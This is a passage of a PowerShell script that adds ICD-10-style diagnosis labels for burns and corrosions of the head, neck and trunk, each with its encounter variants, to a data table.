drum]","Burn of third degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ear [any part, except ear drum]","Burn of third degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ear [any part, except ear drum]","Burn of third degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ear [any part, except ear drum]","Burn of third degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ear [any part, except ear drum]","Burn of third degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ear [any part, except ear drum]","Burn of third degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ear [any part, except ear drum]","Burn of third degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ear [any part, except ear drum]","Burn of third degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ear [any part, except ear drum]","Burn of third degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lip(s)","Burn of third degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lip(s)","Burn of third degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lip(s)","Burn of third degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chin","Burn of third degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chin","Burn of third degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chin","Burn of third degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of nose (septum)","Burn of third degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of nose (septum)","Burn of third degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of nose (septum)","Burn of third degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of scalp [any part]","Burn of third degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of scalp [any part]","Burn of third degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of scalp [any part]","Burn of third degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of forehead and cheek","Burn of third degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of forehead and cheek","Burn of third degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of forehead and cheek","Burn of third degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of neck","Burn of third degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of neck","Burn of third degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of neck","Burn of third degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of head, face, and neck","Burn of third degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of head, face, and neck","Burn of third degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of head, face, and neck","Burn of third degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of head, face, and neck, unspecified site","Corrosion of unspecified degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of head, face, and neck, unspecified site","Corrosion of unspecified degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of head, face, and neck, unspecified site","Corrosion of unspecified degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ear [any part, except ear drum]","Corrosion of unspecified degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ear [any part, except ear drum]","Corrosion of unspecified degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right ear [any part, except ear drum]","Corrosion of unspecified degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ear [any part, except ear drum]","Corrosion of unspecified degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ear [any part, except ear drum]","Corrosion of unspecified degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left ear [any part, except ear drum]","Corrosion of unspecified degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ear [any part, except ear drum]","Corrosion of unspecified degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ear [any part, except ear drum]","Corrosion of unspecified degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified ear [any part, except ear drum]","Corrosion of unspecified degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lip(s)","Corrosion of unspecified degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lip(s)","Corrosion of unspecified degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lip(s)","Corrosion of unspecified degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chin","Corrosion of unspecified degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chin","Corrosion of unspecified degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chin","Corrosion of unspecified degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of nose (septum)","Corrosion of unspecified degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of nose (septum)","Corrosion of unspecified degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of nose (septum)","Corrosion of unspecified degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of scalp [any part]","Corrosion of unspecified degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of scalp [any part]","Corrosion of unspecified degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of scalp [any part]","Corrosion of unspecified degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of forehead and cheek","Corrosion of unspecified degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of forehead and cheek","Corrosion of unspecified degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of forehead and cheek","Corrosion of unspecified degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of neck","Corrosion of unspecified degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of neck","Corrosion of unspecified degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of neck","Corrosion of unspecified degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of head, face, and neck","Corrosion of unspecified degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of head, face, and neck","Corrosion of unspecified degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of head, face, and neck","Corrosion of unspecified degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of head, face, and neck, unspecified site","Corrosion of first degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of head, face, and neck, unspecified site","Corrosion of first degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of head, face, and neck, unspecified site","Corrosion of first degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ear [any part, except ear drum]","Corrosion of first degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ear [any part, except ear drum]","Corrosion of first degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right ear [any part, except ear drum]","Corrosion of first degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ear [any part, except ear drum]","Corrosion of first degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ear [any part, except ear drum]","Corrosion of first degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left ear [any part, except ear drum]","Corrosion of first degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ear [any part, except ear drum]","Corrosion of first degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ear [any part, except ear drum]","Corrosion of first degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified ear [any part, except ear drum]","Corrosion of first degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lip(s)","Corrosion of first degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lip(s)","Corrosion of first degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lip(s)","Corrosion of first degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chin","Corrosion of first degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chin","Corrosion of first degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chin","Corrosion of first degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of nose (septum)","Corrosion of first degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of nose (septum)","Corrosion of first degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of nose (septum)","Corrosion of first degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of scalp [any part]","Corrosion of first degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of scalp [any part]","Corrosion of first degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of scalp [any part]","Corrosion of first degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of forehead and cheek","Corrosion of first degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of forehead and cheek","Corrosion of first degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of forehead and cheek","Corrosion of first degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of neck","Corrosion of first degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of neck","Corrosion of first degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of neck","Corrosion of first degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of head, face, and neck","Corrosion of first degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of head, face, and neck","Corrosion of first degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of head, face, and neck","Corrosion of first degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of head, face, and neck, unspecified site","Corrosion of second degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of head, face, and neck, unspecified site","Corrosion of second degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of head, face, and neck, unspecified site","Corrosion of second degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ear [any part, except ear drum]","Corrosion of second degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ear [any part, except ear drum]","Corrosion of second degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right ear [any part, except ear drum]","Corrosion of second degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ear [any part, except ear drum]","Corrosion of second degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ear [any part, except ear drum]","Corrosion of second degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left ear [any part, except ear drum]","Corrosion of second degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ear [any part, except ear drum]","Corrosion of second degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ear [any part, except ear drum]","Corrosion of second degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified ear [any part, except ear drum]","Corrosion of second degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lip(s)","Corrosion of second degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lip(s)","Corrosion of second degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lip(s)","Corrosion of second degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chin","Corrosion of second degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chin","Corrosion of second degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chin","Corrosion of second degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of nose (septum)","Corrosion of second degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of nose (septum)","Corrosion of second degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of nose (septum)","Corrosion of second degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of scalp [any part]","Corrosion of second degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of scalp [any part]","Corrosion of second degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of scalp [any part]","Corrosion of second degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of forehead and cheek","Corrosion of second degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of forehead and cheek","Corrosion of second degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of forehead and cheek","Corrosion of second degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of neck","Corrosion of second degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of neck","Corrosion of second degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of neck","Corrosion of second degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of head, face, and neck","Corrosion of second degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of head, face, and neck","Corrosion of second degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of head, face, and neck","Corrosion of second degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of head, face, and neck, unspecified site","Corrosion of third degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of head, face, and neck, unspecified site","Corrosion of third degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of head, face, and neck, unspecified site","Corrosion of third degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ear [any part, except ear drum]","Corrosion of third degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ear [any part, except ear drum]","Corrosion of third degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right ear [any part, except ear drum]","Corrosion of third degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ear [any part, except ear drum]","Corrosion of third degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ear [any part, except ear drum]","Corrosion of third degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left ear [any part, except ear drum]","Corrosion of third degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ear [any part, except ear drum]","Corrosion of third degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ear [any part, except ear drum]","Corrosion of third degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified ear [any part, except ear drum]","Corrosion of third degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lip(s)","Corrosion of third degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lip(s)","Corrosion of third degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lip(s)","Corrosion of third degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chin","Corrosion of third degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chin","Corrosion of third degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chin","Corrosion of third degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of nose (septum)","Corrosion of third degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of nose (septum)","Corrosion of third degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of nose (septum)","Corrosion of third degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of scalp [any part]","Corrosion of third degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of scalp [any part]","Corrosion of third degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of scalp [any part]","Corrosion of third degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of forehead and cheek","Corrosion of third degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of forehead and cheek","Corrosion of third degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of forehead and cheek","Corrosion of third degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of neck","Corrosion of third degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of neck","Corrosion of third degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of neck","Corrosion of third degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of head, face, and neck","Corrosion of third degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of head, face, and neck","Corrosion of third degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of head, face, and neck","Corrosion of third degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of trunk, unspecified site","Burn of unspecified degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of trunk, unspecified site","Burn of unspecified degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of trunk, unspecified site","Burn of unspecified degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chest wall","Burn of unspecified degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chest wall","Burn of unspecified degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chest wall","Burn of unspecified degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of abdominal wall","Burn of unspecified degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of abdominal wall","Burn of unspecified degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of abdominal wall","Burn of unspecified degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of upper back","Burn of unspecified degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of upper back","Burn of unspecified degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of upper back","Burn of unspecified degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lower back","Burn of unspecified degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lower back","Burn of unspecified degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lower back","Burn of unspecified degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of buttock","Burn of unspecified degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of buttock","Burn of unspecified degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of buttock","Burn of unspecified degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of male genital region","Burn of unspecified degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of male genital region","Burn of unspecified degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of male genital region","Burn of unspecified degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of female genital region","Burn of unspecified degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of female genital region","Burn of unspecified degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of female genital region","Burn of unspecified degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of other site of trunk","Burn of unspecified degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of other site of trunk","Burn of unspecified degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of other site of trunk","Burn of unspecified degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of trunk, unspecified site","Burn of first degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of trunk, unspecified site","Burn of first degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of trunk, unspecified site","Burn of first degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chest wall","Burn of first degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chest wall","Burn of first degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chest wall","Burn of first degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of abdominal wall","Burn of first degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of abdominal wall","Burn of first degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of abdominal wall","Burn of first degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of upper back","Burn of first degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of upper back","Burn of first degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of upper back","Burn of first degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lower back","Burn of first degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lower back","Burn of first degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lower back","Burn of first degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of buttock","Burn of first degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of buttock","Burn of first degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of buttock","Burn of first degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of male genital region","Burn of first degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of male genital region","Burn of first degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of male genital region","Burn of first degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of female genital region","Burn of first degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of female genital region","Burn of first degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of female genital region","Burn of first degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of other site of trunk","Burn of first degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of other site of trunk","Burn of first degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of other site of trunk","Burn of first degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of trunk, unspecified site","Burn of second degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of trunk, unspecified site","Burn of second degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of trunk, unspecified site","Burn of second degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chest wall","Burn of second degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chest wall","Burn of second degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chest wall","Burn of second degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of abdominal wall","Burn of second degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of abdominal wall","Burn of second degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of abdominal wall","Burn of second degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of upper back","Burn of second degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of upper back","Burn of second degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of upper back","Burn of second degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lower back","Burn of second degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lower back","Burn of second degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lower back","Burn of second degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of buttock","Burn of second degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of buttock","Burn of second degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of buttock","Burn of second degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of male genital region","Burn of second degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of male genital region","Burn of second degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of male genital region","Burn of second degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of female genital region","Burn of second degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of female genital region","Burn of second degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of female genital region","Burn of second degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of other site of trunk","Burn of second degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of other site of trunk","Burn of second degree of other site of trunk, subsequent encounter") + $null = 